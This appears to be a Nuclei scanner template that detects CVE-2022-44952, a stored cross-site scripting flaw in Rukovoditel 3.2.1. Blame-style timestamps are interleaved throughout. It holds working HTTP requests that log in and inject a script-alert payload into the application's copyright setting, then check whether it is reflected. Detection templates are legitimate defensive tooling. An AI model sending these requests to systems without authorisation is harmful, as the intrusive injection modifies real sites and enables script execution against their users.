2023-07-07 09:38:49 +00:00
id : CVE-2022-44952
info :
name : Rukovoditel <= 3.2.1 - Cross Site Scripting
author : r3Y3r53
severity : medium
description : |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.
2023-07-07 09:38:49 +00:00
reference :
- https://github.com/anhdq201/rukovoditel/issues/9
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44952
2023-07-11 19:49:27 +00:00
- http://rukovoditel.com
2023-07-07 09:38:49 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2023-07-07 09:38:49 +00:00
cvss-score : 5.4
cve-id : CVE-2022-44952
cwe-id : CWE-79
2023-11-03 10:59:12 +00:00
epss-score : 0.13545
2023-11-07 14:54:31 +00:00
epss-percentile : 0.95002
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
2023-07-07 09:38:49 +00:00
metadata :
verified : true
2023-09-06 11:59:08 +00:00
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : rukovoditel
product : rukovoditel
tags : cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive
2023-07-07 09:38:49 +00:00
http :
- raw :
- |
GET /index.php?module=users/login HTTP/1.1
Host : {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_NAME]"
Test
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_SHORT_NAME]"
test
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="APP_LOGO"; filename=""
Content-Type : application/octet-stream
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_LOGO]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_LOGO_URL]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="APP_FAVICON"; filename=""
Content-Type : application/octet-stream
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_FAVICON]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_COPYRIGHT_NAME]"
<script>alert(document.domain)</script>
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_LANGUAGE]"
english.php
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_SKIN]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_TIMEZONE]"
America/New_York
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_NUMBER_FORMAT]"
2 /./*
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition : form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
0
------WebKitFormBoundaryMh2HSjWbM7zJjWOA--
- |
@timeout : 5s
GET /index.php?module=dashboard/ HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
redirects : true
matchers :
- type : dsl
dsl :
2023-07-11 19:49:27 +00:00
- status_code_4 == 200
- contains(content_type_4, "text/html")
- contains(body_4, "<script>alert(document.domain)</script>")
- contains(body_4, "rukovoditel")
2023-07-07 09:38:49 +00:00
condition : and
extractors :
- type : regex
name : nonce
group : 1
regex :
2023-07-11 19:49:27 +00:00
- id="form_session_token" value="(.*)" type="hidden"
2023-07-07 09:38:49 +00:00
internal : true
2023-11-07 17:58:22 +00:00
# digest: 490a004630440220533ed101264ba7835be6e5f3a38007bb99c33aeff81fd8e93beea2c8e0aabdbe02204ede9900fddfccd83df734628b641350b6704e493d5bdcccb3e78d885dcd7d82:922c64590222798bb761d5b6d8e72950